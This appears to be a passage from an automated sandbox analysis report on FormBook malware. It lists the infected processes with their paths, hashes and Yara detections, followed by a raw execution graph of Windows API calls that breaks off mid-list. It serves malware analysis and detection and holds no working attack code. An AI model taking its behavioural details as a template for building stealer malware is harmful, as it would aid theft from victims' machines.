                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1580637311.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1580637311.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1581046777.0000000005730000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1581046777.0000000005730000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:moderate
                          Has exited:true

                          General

                          Target ID:5
                          Start time:02:15:29
                          Start date:18/07/2024
                          Path:C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe"
                          Imagebase:0x6c0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3789791469.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3789791469.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:7
                          Start time:02:15:30
                          Start date:18/07/2024
                          Path:C:\Windows\SysWOW64\findstr.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\SysWOW64\findstr.exe"
                          Imagebase:0x8d0000
                          File size:29'696 bytes
                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:moderate
                          Has exited:false

                          General

                          Target ID:9
                          Start time:02:15:43
                          Start date:18/07/2024
                          Path:C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe"
                          Imagebase:0x6c0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3793025669.0000000005700000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3793025669.0000000005700000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:10
                          Start time:02:16:00
                          Start date:18/07/2024
                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                          Imagebase:0x7ff73feb0000
                          File size:676'768 bytes
                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:6%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:25.1%
                            Total number of Nodes:920
                            Total number of Limit Nodes:38
                            execution_graph 15282 7ff6e826f54d 15285 7ff6e82916f0 15282->15285 15284 7ff6e826f52b 15288 7ff6e826c260 15285->15288 15287 7ff6e829172a 15287->15284 15289 7ff6e826c2aa 15288->15289 15295 7ff6e826c381 15289->15295 15296 7ff6e8291540 15289->15296 15292 7ff6e826c5a3 15292->15295 15308 7ff6e8273ff0 15292->15308 15294 7ff6e826c3bb _swprintf_c_l 15294->15292 15304 7ff6e8284530 15294->15304 15295->15287 15297 7ff6e8291559 15296->15297 15301 7ff6e8291569 15296->15301 15297->15294 15298 7ff6e82916ab SwitchToThread 15298->15301 15299 7ff6e82915b9 SwitchToThread 15299->15301 15300 7ff6e82916b7 15300->15294 15301->15298 15301->15299 15301->15300 15302 7ff6e8291660 SwitchToThread 15301->15302 15303 7ff6e8291676 SwitchToThread 15301->15303 15302->15301 15303->15301 15305 7ff6e828454e 15304->15305 15307 7ff6e82845b9 _swprintf_c_l 15304->15307 15305->15307 15313 7ff6e8262c80 VirtualAlloc 15305->15313 15307->15292 15309 7ff6e8284530 2 API calls 15308->15309 15310 7ff6e8274025 _swprintf_c_l 15309->15310 15311 7ff6e8291540 4 API calls 15310->15311 15312 7ff6e8274175 15311->15312 15312->15295 15312->15312 15314 7ff6e8262cbb 15313->15314 15315 7ff6e8262ccc 15313->15315 15314->15315 15316 7ff6e8262cc0 VirtualUnlock 15314->15316 15315->15307 15316->15315 15317 7ff6e8269d8d 15318 7ff6e8269d99 15317->15318 15333 7ff6e827c090 15318->15333 15321 7ff6e8269dcd 15337 7ff6e8262930 QueryPerformanceCounter 15321->15337 15324 7ff6e8269dee 15338 7ff6e825daf0 15324->15338 15326 7ff6e827c090 SwitchToThread 15328 7ff6e8269fd5 15326->15328 15327 7ff6e8262930 QueryPerformanceCounter 15330 7ff6e8269f4d 15327->15330 15331 7ff6e8262980 SetEvent 15328->15331 15332 7ff6e8269ff8 15328->15332 15329 7ff6e8269e3e 15329->15327 15329->15330 15330->15326 15331->15332 15334 7ff6e8269daf 15333->15334 15335 7ff6e827c0af 15333->15335 15334->15321 15342 7ff6e8262970 ResetEvent 15334->15342 15335->15334 15336 7ff6e827c0f1 SwitchToThread 15335->15336 15336->15335 15337->15324 15339 7ff6e825dafd 15338->15339 15343 7ff6e8257b00 15339->15343 15344 7ff6e8257b42 15343->15344 15345 7ff6e8257b66 FlushProcessWriteBuffers 15344->15345 15349 7ff6e8257b83 15345->15349 15346 7ff6e8257c69 15348 7ff6e8257bf9 SwitchToThread 15348->15349 15349->15346 15349->15348 15350 7ff6e8252c00 15349->15350 15351 7ff6e8252c27 15350->15351 15352 7ff6e8252c07 15350->15352 15351->15349 15352->15351 15353 7ff6e825cac1 LoadLibraryExW GetProcAddress 15352->15353 15366 7ff6e825cbc4 15352->15366 15355 7ff6e825cbad GetProcAddress 15353->15355 15356 7ff6e825caf5 GetCurrentProcess 15353->15356 15354 7ff6e825cc25 SuspendThread 15357 7ff6e825cc89 15354->15357 15358 7ff6e825cc33 GetThreadContext 15354->15358 15355->15366 15363 7ff6e825cb0a _swprintf_c_l 15356->15363 15368 7ff6e82b0c30 15357->15368 15359 7ff6e825cc53 15358->15359 15360 7ff6e825cc80 ResumeThread 15358->15360 15359->15360 15360->15357 15363->15355 15364 7ff6e825cb41 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 15363->15364 15364->15355 15365 7ff6e825cc19 15364->15365 15365->15354 15365->15357 15366->15354 15366->15357 15367 7ff6e825cc0e GetLastError 15366->15367 15367->15365 15369 7ff6e82b0c39 15368->15369 15370 7ff6e825cc99 15369->15370 15371 7ff6e82b0ee0 IsProcessorFeaturePresent 15369->15371 15370->15349 15372 7ff6e82b0ef8 15371->15372 15377 7ff6e82b10d8 RtlCaptureContext 15372->15377 15378 7ff6e82b10f2 RtlLookupFunctionEntry 15377->15378 15379 7ff6e82b0f0b 15378->15379 15380 7ff6e82b1108 RtlVirtualUnwind 15378->15380 15381 7ff6e82b0eac SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15379->15381 15380->15378 15380->15379 15382 7ff6e8255f12 15383 7ff6e8255f20 15382->15383 15386 7ff6e82f4c20 15383->15386 15384 7ff6e8260fb7 15384->15384 15387 7ff6e82f4c39 15386->15387 15390 7ff6e82f4d20 15387->15390 15389 7ff6e82f4c49 15389->15384 15391 7ff6e82f4d59 15390->15391 15393 7ff6e82f4d36 15390->15393 15395 7ff6e82f4dc0 15391->15395 15393->15389 15394 7ff6e82f4d6d 15394->15389 15396 7ff6e82f4de2 15395->15396 15397 7ff6e82f4f26 15396->15397 15398 7ff6e82f4e42 15396->15398 15402 7ff6e82547e0 15396->15402 15399 7ff6e82547e0 26 API calls 15397->15399 15398->15394 15400 7ff6e82f4f39 15399->15400 15403 7ff6e825489b 15402->15403 15408 7ff6e82f59a0 15403->15408 15409 7ff6e82f59b2 15408->15409 15412 7ff6e82f5a60 15409->15412 15425 7ff6e82572b0 15412->15425 15414 7ff6e82f5bcc 15457 7ff6e8253f20 15414->15457 15416 7ff6e82f5adf 15418 7ff6e82f5b97 15416->15418 15445 7ff6e82573f0 15416->15445 15418->15414 15453 7ff6e82f5620 15418->15453 15426 7ff6e82572fb 15425->15426 15427 7ff6e8257340 15426->15427 15428 7ff6e8257300 15426->15428 15429 7ff6e825735a 15427->15429 15431 7ff6e825e7d0 4 API calls 15427->15431 15430 7ff6e825731a 15428->15430 15460 7ff6e825e7d0 15428->15460 15433 7ff6e825738b 15429->15433 15434 7ff6e8257376 15429->15434 15466 7ff6e8256700 15430->15466 15431->15429 15437 7ff6e8256eb0 2 API calls 15433->15437 15436 7ff6e8256eb0 2 API calls 15434->15436 15439 7ff6e8257382 15436->15439 15437->15439 15441 7ff6e825733e 15439->15441 15442 7ff6e825e7d0 4 API calls 15439->15442 15443 7ff6e82573c2 15441->15443 15479 7ff6e8256090 15441->15479 15442->15441 15443->15416 15446 7ff6e8257432 15445->15446 15511 7ff6e8256aa0 15446->15511 15448 7ff6e8257441 15449 7ff6e8257462 15448->15449 15450 7ff6e825e7d0 4 API calls 15448->15450 15451 7ff6e8256090 2 API calls 15449->15451 15452 7ff6e8257473 15449->15452 15450->15449 15451->15452 15452->15416 15454 7ff6e82f5654 15453->15454 15540 7ff6e8253c90 15454->15540 15456 7ff6e82f5691 15456->15414 15458 7ff6e8253f48 RaiseFailFastException 15457->15458 15459 7ff6e8253f55 15457->15459 15458->15459 15461 7ff6e825e87c 15460->15461 15463 7ff6e825e80b 15460->15463 15461->15430 15463->15461 15465 7ff6e825e844 15463->15465 15485 7ff6e825e4f0 15463->15485 15465->15461 15493 7ff6e825e890 15465->15493 15468 7ff6e825671d _swprintf_c_l 15466->15468 15467 7ff6e82568e1 15474 7ff6e8256eb0 15467->15474 15468->15467 15469 7ff6e82568c0 15468->15469 15470 7ff6e82568b8 15468->15470 15471 7ff6e82568a9 RaiseFailFastException 15468->15471 15469->15467 15472 7ff6e825e7d0 4 API calls 15469->15472 15505 7ff6e82570f0 15470->15505 15471->15469 15472->15467 15475 7ff6e8256f10 15474->15475 15476 7ff6e8256ec2 15474->15476 15475->15441 15476->15475 15477 7ff6e8256090 2 API calls 15476->15477 15478 7ff6e8256eeb 15477->15478 15478->15441 15480 7ff6e82560b0 15479->15480 15481 7ff6e82560a8 15479->15481 15480->15443 15481->15480 15482 7ff6e8256126 15481->15482 15483 7ff6e8256119 RaiseFailFastException 15481->15483 15482->15480 15484 7ff6e8256141 RaiseFailFastException 15482->15484 15483->15482 15484->15480 15489 7ff6e825e514 15485->15489 15488 7ff6e82b0c50 _swprintf_c_l 3 API calls 15490 7ff6e825e5af 15488->15490 15489->15490 15497 7ff6e82b0c50 15489->15497 15491 7ff6e825e63c 15490->15491 15500 7ff6e825ca30 GetCurrentThreadId 15490->15500 15491->15465 15494 7ff6e825e8ca 15493->15494 15496 7ff6e825e8f4 15494->15496 15501 7ff6e825e320 15494->15501 15496->15461 15498 7ff6e82b1554 _swprintf_c_l malloc RtlPcToFileHeader RaiseException 15497->15498 15499 7ff6e825e584 15498->15499 15499->15488 15499->15491 15500->15491 15502 7ff6e825e34a _swprintf_c_l 15501->15502 15503 7ff6e825e371 15502->15503 15504 7ff6e82b0c50 _swprintf_c_l malloc RtlPcToFileHeader RaiseException 15502->15504 15503->15496 15504->15503 15509 7ff6e8257103 15505->15509 15506 7ff6e8257243 RaiseFailFastException 15506->15509 15507 7ff6e82571c2 RaiseFailFastException 15507->15509 15508 7ff6e82571d8 RaiseFailFastException 15508->15509 15509->15506 15509->15507 15509->15508 15510 7ff6e8257271 15509->15510 15510->15469 15520 7ff6e8256ada 15511->15520 15512 7ff6e8256b50 RaiseFailFastException 15512->15520 15513 7ff6e8256dc8 15514 7ff6e8256700 8 API calls 15513->15514 15517 7ff6e8256dce 15513->15517 15514->15517 15515 7ff6e8256e9a 15515->15448 15516 7ff6e8256e1c 15519 7ff6e82570f0 3 API calls 15516->15519 15517->15515 15522 7ff6e8256090 2 API calls 15517->15522 15518 7ff6e8256e0d RaiseFailFastException 15518->15517 15519->15517 15520->15512 15520->15513 15520->15516 15520->15517 15520->15518 15521 7ff6e8256ca4 RaiseFailFastException 15520->15521 15524 7ff6e8256090 2 API calls 15520->15524 15526 7ff6e8256d7b RaiseFailFastException 15520->15526 15527 7ff6e8256d91 RaiseFailFastException 15520->15527 15528 7ff6e825e7d0 4 API calls 15520->15528 15529 7ff6e8256320 15520->15529 15521->15520 15525 7ff6e8256e73 15522->15525 15524->15520 15525->15448 15526->15520 15527->15520 15528->15520 15530 7ff6e825634d 15529->15530 15531 7ff6e8256377 15529->15531 15532 7ff6e825e7d0 4 API calls 15530->15532 15533 7ff6e82564e6 15531->15533 15537 7ff6e82563a4 15531->15537 15532->15531 15534 7ff6e82564ec RaiseFailFastException 15533->15534 15535 7ff6e82564f9 15533->15535 15534->15535 15536 7ff6e8256090 2 API calls 15535->15536 15539 7ff6e82564d1 15536->15539 15538 7ff6e8256090 2 API calls 15537->15538 15538->15539 15539->15520 15541 7ff6e8253caa _swprintf_c_l 15540->15541 15544 7ff6e825cfc0 RtlCaptureContext 15541->15544 15545 7ff6e82b0c30 8 API calls 15544->15545 15546 7ff6e8253cb9 15545->15546 15546->15456 15547 7ff6e826b310 15548 7ff6e826b31b 15547->15548 15549 7ff6e826b320 15548->15549 15550 7ff6e825daf0 22 API calls 15548->15550 15551 7ff6e826b359 15550->15551 15556 7ff6e8262320 15551->15556 15555 7ff6e826b3b7 15557 7ff6e8262354 GetCurrentProcess IsProcessInJob 15556->15557 15558 7ff6e8262351 15556->15558 15559 7ff6e826237a 15557->15559 15560 7ff6e826242f 15557->15560 15558->15557 15559->15560 15561 7ff6e8262384 QueryInformationJobObject 15559->15561 15562 7ff6e8262436 GlobalMemoryStatusEx 15560->15562 15564 7ff6e826245f 15560->15564 15561->15560 15566 7ff6e82623aa 15561->15566 15562->15564 15563 7ff6e82623f3 GlobalMemoryStatusEx 15563->15560 15565 7ff6e826247d GlobalMemoryStatusEx 15564->15565 15567 7ff6e8262470 15564->15567 15565->15567 15566->15560 15566->15563 15568 7ff6e82b0c30 8 API calls 15567->15568 15569 7ff6e82624bf 15568->15569 15570 7ff6e8264610 15569->15570 15587 7ff6e825d7a0 15570->15587 15573 7ff6e825d7a0 18 API calls 15574 7ff6e8264656 15573->15574 15575 7ff6e825d7a0 18 API calls 15574->15575 15576 7ff6e826467e 15575->15576 15577 7ff6e825d7a0 18 API calls 15576->15577 15578 7ff6e82646a6 15577->15578 15579 7ff6e825d7a0 18 API calls 15578->15579 15580 7ff6e82646ce 15579->15580 15581 7ff6e825d7a0 18 API calls 15580->15581 15582 7ff6e82646f6 15581->15582 15583 7ff6e825d7a0 18 API calls 15582->15583 15584 7ff6e826471e 15583->15584 15585 7ff6e825d7a0 18 API calls 15584->15585 15586 7ff6e8264746 15585->15586 15586->15555 15588 7ff6e825d7ca 15587->15588 15589 7ff6e825d8df 15587->15589 15590 7ff6e825d7d7 strcmp 15588->15590 15591 7ff6e825d7ef 15588->15591 15609 7ff6e825df30 15589->15609 15590->15591 15599 7ff6e825d7e7 15590->15599 15593 7ff6e825d7fc strcmp 15591->15593 15594 7ff6e825d80f 15591->15594 15593->15594 15593->15599 15595 7ff6e825d81c strcmp 15594->15595 15596 7ff6e825d82f 15594->15596 15595->15596 15595->15599 15597 7ff6e825d83c strcmp 15596->15597 15598 7ff6e825d84f 15596->15598 15597->15598 15597->15599 15602 7ff6e825d85c strcmp 15598->15602 15603 7ff6e825d873 15598->15603 15599->15573 15600 7ff6e825d8f6 15600->15599 15612 7ff6e825e0b0 15600->15612 15602->15599 15602->15603 15604 7ff6e825d897 15603->15604 15605 7ff6e825d880 strcmp 15603->15605 15606 7ff6e825d8bb 15604->15606 15607 7ff6e825d8a4 strcmp 15604->15607 15605->15599 15605->15604 15606->15589 15608 7ff6e825d8c8 strcmp 15606->15608 15607->15599 15607->15606 15608->15589 15608->15599 15617 7ff6e825e140 15609->15617 15611 7ff6e825df58 15611->15600 15613 7ff6e825e0d4 15612->15613 15614 7ff6e825e0fe 15612->15614 15613->15614 15615 7ff6e825e0e0 _stricmp 15613->15615 15614->15599 15615->15613 15616 7ff6e825e115 strtoull 15615->15616 15616->15614 15620 7ff6e825e176 15617->15620 15618 7ff6e82b0c30 8 API calls 15619 7ff6e825e21a 15618->15619 15619->15611 15620->15618 15621 7ff6e8282670 15622 7ff6e828268d 15621->15622 15643 7ff6e82629a0 VirtualAlloc 15622->15643 15624 7ff6e82826b3 15646 7ff6e8262740 InitializeCriticalSection 15624->15646 15626 7ff6e82826fd 15627 7ff6e8282b23 15626->15627 15647 7ff6e8292dc0 15626->15647 15629 7ff6e828272c _swprintf_c_l 15642 7ff6e828296a 15629->15642 15657 7ff6e8282380 15629->15657 15631 7ff6e82828ff 15661 7ff6e8262ab0 15631->15661 15633 7ff6e8282939 15633->15642 15664 7ff6e8282b50 15633->15664 15635 7ff6e828295b 15636 7ff6e828295f 15635->15636 15638 7ff6e828298e 15635->15638 15719 7ff6e8262a90 VirtualFree 15636->15719 15638->15642 15681 7ff6e82959f0 15638->15681 15644 7ff6e82629d9 15643->15644 15645 7ff6e82629c1 VirtualFree 15643->15645 15644->15624 15645->15624 15646->15626 15648 7ff6e8292def 15647->15648 15649 7ff6e8292e12 15648->15649 15650 7ff6e8292e1c 15648->15650 15655 7ff6e8292e47 15648->15655 15720 7ff6e8262b30 15649->15720 15652 7ff6e8262ab0 3 API calls 15650->15652 15654 7ff6e8292e2d 15652->15654 15654->15655 15731 7ff6e8262a90 VirtualFree 15654->15731 15655->15629 15659 7ff6e828239f 15657->15659 15660 7ff6e82823bb 15659->15660 15732 7ff6e8262020 15659->15732 15660->15631 15662 7ff6e8262ad5 VirtualAlloc 15661->15662 15663 7ff6e8262af4 GetCurrentProcess VirtualAllocExNuma 15661->15663 15662->15663 15663->15633 15665 7ff6e8282b85 15664->15665 15666 7ff6e8282b89 15665->15666 15674 7ff6e8282ba3 15665->15674 15667 7ff6e82b0c30 8 API calls 15666->15667 15668 7ff6e8282b9b 15667->15668 15668->15635 15669 7ff6e8282bee EnterCriticalSection 15669->15674 15670 7ff6e8282c7f 15675 7ff6e82b0c30 8 API calls 15670->15675 15671 7ff6e8282c2e LeaveCriticalSection 15740 7ff6e82629e0 15671->15740 15672 7ff6e8282d39 LeaveCriticalSection 15672->15670 15679 7ff6e8282d4e 15672->15679 15674->15669 15674->15670 15674->15671 15674->15672 15676 7ff6e8282d18 EnterCriticalSection 15674->15676 15677 7ff6e8282d10 15675->15677 15676->15672 15677->15635 15679->15670 15680 7ff6e8282d73 EnterCriticalSection LeaveCriticalSection 15679->15680 15739 7ff6e8262a70 VirtualFree 15679->15739 15680->15679 15743 7ff6e8295930 15681->15743 15684 7ff6e8281d80 15688 7ff6e8281de8 15684->15688 15685 7ff6e8281e11 15686 7ff6e8282344 15685->15686 15687 7ff6e8282350 15685->15687 15718 7ff6e82822cf 15685->15718 15768 7ff6e8261ec0 CloseHandle 15686->15768 15690 7ff6e8282359 15687->15690 15691 7ff6e8282365 15687->15691 15688->15685 15747 7ff6e8261f60 15688->15747 15769 7ff6e8261ec0 CloseHandle 15690->15769 15691->15642 15694 7ff6e8281e52 15694->15685 15695 7ff6e8261f60 4 API calls 15694->15695 15696 7ff6e8281e68 _swprintf_c_l 15695->15696 15696->15685 15752 7ff6e8262140 15696->15752 15698 7ff6e8282176 15699 7ff6e8261f60 4 API calls 15698->15699 15700 7ff6e82821ee 15699->15700 15701 7ff6e8282230 15700->15701 15702 7ff6e8261f60 4 API calls 15700->15702 15701->15685 15703 7ff6e82822fc 15701->15703 15704 7ff6e82822f0 15701->15704 15705 7ff6e8282204 15702->15705 15707 7ff6e8282305 15703->15707 15708 7ff6e8282311 15703->15708 15764 7ff6e8261ec0 CloseHandle 15704->15764 15705->15701 15759 7ff6e8261ee0 15705->15759 15765 7ff6e8261ec0 CloseHandle 15707->15765 15710 7ff6e828231a 15708->15710 15711 7ff6e8282326 15708->15711 15766 7ff6e8261ec0 CloseHandle 15710->15766 15711->15685 15713 7ff6e828232f 15711->15713 15767 7ff6e8261ec0 CloseHandle 15713->15767 15716 7ff6e828221a 15716->15701 15717 7ff6e8261f60 4 API calls 15716->15717 15717->15701 15718->15642 15719->15642 15721 7ff6e8262bf6 GetLargePageMinimum 15720->15721 15722 7ff6e8262b5e LookupPrivilegeValueW 15720->15722 15725 7ff6e8262c16 VirtualAlloc 15721->15725 15726 7ff6e8262c33 GetCurrentProcess VirtualAllocExNuma 15721->15726 15723 7ff6e8262b7a GetCurrentProcess OpenProcessToken 15722->15723 15724 7ff6e8262c2f 15722->15724 15723->15724 15727 7ff6e8262bb1 AdjustTokenPrivileges GetLastError CloseHandle 15723->15727 15728 7ff6e82b0c30 8 API calls 15724->15728 15725->15724 15726->15724 15727->15724 15729 7ff6e8262beb 15727->15729 15730 7ff6e8262c66 15728->15730 15729->15721 15729->15724 15730->15654 15731->15655 15733 7ff6e8262028 15732->15733 15734 7ff6e8262041 GetLogicalProcessorInformation 15733->15734 15738 7ff6e826206d 15733->15738 15735 7ff6e8262062 GetLastError 15734->15735 15736 7ff6e8262074 15734->15736 15735->15736 15735->15738 15737 7ff6e82620b1 GetLogicalProcessorInformation 15736->15737 15736->15738 15737->15738 15738->15660 15739->15679 15741 7ff6e82629fb VirtualAlloc 15740->15741 15742 7ff6e8262a1e GetCurrentProcess VirtualAllocExNuma 15740->15742 15741->15674 15742->15674 15744 7ff6e8295949 15743->15744 15746 7ff6e8282b02 15743->15746 15745 7ff6e8295960 GetEnabledXStateFeatures 15744->15745 15744->15746 15745->15746 15746->15684 15748 7ff6e82b0c50 _swprintf_c_l 3 API calls 15747->15748 15749 7ff6e8261f86 15748->15749 15750 7ff6e8261f8e CreateEventW 15749->15750 15751 7ff6e8261fb0 15749->15751 15750->15751 15751->15694 15753 7ff6e8262177 GetCurrentProcess 15752->15753 15754 7ff6e826222f GlobalMemoryStatusEx 15752->15754 15755 7ff6e8262190 15753->15755 15757 7ff6e8262198 15754->15757 15755->15754 15755->15757 15756 7ff6e82b0c30 8 API calls 15758 7ff6e8262308 15756->15758 15757->15756 15758->15698 15760 7ff6e82b0c50 _swprintf_c_l 3 API calls 15759->15760 15761 7ff6e8261f06 15760->15761 15762 7ff6e8261f0e CreateEventW 15761->15762 15763 7ff6e8261f2e 15761->15763 15762->15763 15763->15716 15764->15703 15765->15708 15766->15711 15767->15685 15768->15687 15769->15691 15770 7ff6e826e731 15773 7ff6e826e750 15770->15773 15771 7ff6e826e832 15800 7ff6e8287780 15771->15800 15773->15771 15774 7ff6e826e7b2 15773->15774 15784 7ff6e826e6f2 15774->15784 15787 7ff6e826f3d0 15774->15787 15776 7ff6e826e8d4 15814 7ff6e826ed80 15776->15814 15777 7ff6e826e7ff 15779 7ff6e826e839 15786 7ff6e826e888 15779->15786 15804 7ff6e8293070 15779->15804 15781 7ff6e826e8ec 15781->15784 15782 7ff6e826e86b 15782->15784 15785 7ff6e8287780 GetTickCount64 15782->15785 15782->15786 15784->15777 15796 7ff6e8293140 15784->15796 15785->15786 15786->15774 15786->15776 15786->15784 15789 7ff6e826f412 15787->15789 15788 7ff6e826f4e5 15788->15784 15789->15788 15790 7ff6e826f4a6 15789->15790 15791 7ff6e826f4f7 15789->15791 15792 7ff6e826f4b5 SwitchToThread 15790->15792 15791->15788 15826 7ff6e82683d0 15791->15826 15794 7ff6e826f4c3 15792->15794 15794->15788 15820 7ff6e827c120 15794->15820 15797 7ff6e8293156 15796->15797 15798 7ff6e829318d 15797->15798 15834 7ff6e8262cf0 WaitForSingleObject 15797->15834 15798->15784 15801 7ff6e82877c2 15800->15801 15802 7ff6e828779e 15800->15802 15801->15802 15803 7ff6e82877e6 GetTickCount64 15801->15803 15802->15779 15803->15802 15805 7ff6e8293090 15804->15805 15806 7ff6e829312a 15804->15806 15807 7ff6e8262140 10 API calls 15805->15807 15806->15782 15808 7ff6e82930b7 15807->15808 15809 7ff6e829311a 15808->15809 15810 7ff6e82683d0 WaitForSingleObject 15808->15810 15809->15782 15811 7ff6e82930ee 15810->15811 15812 7ff6e8293101 15811->15812 15813 7ff6e827c120 3 API calls 15811->15813 15812->15782 15813->15812 15815 7ff6e826ee1b 15814->15815 15816 7ff6e826edb7 15814->15816 15815->15781 15815->15815 15816->15815 15817 7ff6e8262990 SleepEx 15816->15817 15818 7ff6e826edf5 15817->15818 15818->15815 15819 7ff6e827c120 3 API calls 15818->15819 15819->15815 15823 7ff6e827c140 15820->15823 15821 7ff6e827c2a8 15821->15788 15822 7ff6e827c215 SwitchToThread 15822->15823 15823->15821 15823->15822 15824 7ff6e827c24d SwitchToThread 15823->15824 15830 7ff6e8262990 15823->15830 15824->15823 15827 7ff6e82683e8 15826->15827 15833 7ff6e8262cf0 WaitForSingleObject 15827->15833 15831 7ff6e826299d 15830->15831 15832 7ff6e8262994 SleepEx 15830->15832 15831->15823 15832->15831 15835 7ff6e8254070 15840 7ff6e8257580 15835->15840 15837 7ff6e8254082 15846 7ff6e82f53a0 15837->15846 15841 7ff6e82575a6 15840->15841 15845 7ff6e82575c4 15841->15845 15853 7ff6e825c8a0 FlsGetValue 15841->15853 15843 7ff6e82575bc 15844 7ff6e82526b0 6 API calls 15843->15844 15844->15845 15845->15837 15856 7ff6e8253200 15846->15856 15848 7ff6e82f53c1 15872 7ff6e82e1940 15848->15872 15851 7ff6e82f53c6 15875 7ff6e82541d0 15851->15875 15880 7ff6e82541a0 15851->15880 15854 7ff6e825c8ba RaiseFailFastException 15853->15854 15855 7ff6e825c8c8 FlsSetValue 15853->15855 15854->15855 15857 7ff6e825325e 15856->15857 15858 7ff6e825322f 15856->15858 15857->15848 15858->15857 15859 7ff6e82532ef 15858->15859 15862 7ff6e82532d6 15858->15862 15867 7ff6e82532b7 15858->15867 15868 7ff6e8253298 15858->15868 15860 7ff6e82532f6 15859->15860 15861 7ff6e825330f 15859->15861 15884 7ff6e825ce20 15860->15884 15865 7ff6e8253335 15861->15865 15887 7ff6e82530c0 GetLastError 15861->15887 15863 7ff6e8257580 9 API calls 15862->15863 15863->15859 15865->15848 15866 7ff6e8253302 RaiseFailFastException 15866->15861 15867->15862 15871 7ff6e82532c9 RaiseFailFastException 15867->15871 15870 7ff6e82532a0 Sleep 15868->15870 15870->15867 15870->15870 15871->15862 15890 7ff6e82e1a90 15872->15890 15874 7ff6e82e1950 15874->15851 15877 7ff6e82541e0 15875->15877 15876 7ff6e82541ec WaitForSingleObjectEx 15876->15877 15879 7ff6e8254224 15876->15879 15877->15876 15878 7ff6e8254215 15877->15878 15878->15851 15879->15851 15881 7ff6e82541b6 15880->15881 15882 7ff6e8260b8a 15881->15882 15883 7ff6e8260b91 SetEvent 15881->15883 15882->15851 15883->15851 15885 7ff6e825ce34 15884->15885 15885->15885 15886 7ff6e825ce3d GetStdHandle WriteFile 15885->15886 15886->15866 15888 7ff6e82530e4 SetLastError 15887->15888 15892 7ff6e82e1abc 15890->15892 15891 7ff6e82e1b2e 15891->15874 15892->15891 15893 7ff6e82e1b02 CoInitializeEx 15892->15893 15894 7ff6e82e1b19 15893->15894 15895 7ff6e82e1b1d 15894->15895 15898 7ff6e82e1b30 15894->15898 15895->15891 15902 7ff6e82e1bb0 15895->15902 15897 7ff6e82e1b8e 15900 7ff6e82547e0 26 API calls 15897->15900 15898->15891 15898->15897 15899 7ff6e82547e0 26 API calls 15898->15899 15899->15897 15901 7ff6e82e1bae 15900->15901 15904 7ff6e82e1bd6 15902->15904 15903 7ff6e82e1c17 15903->15891 15904->15903 15905 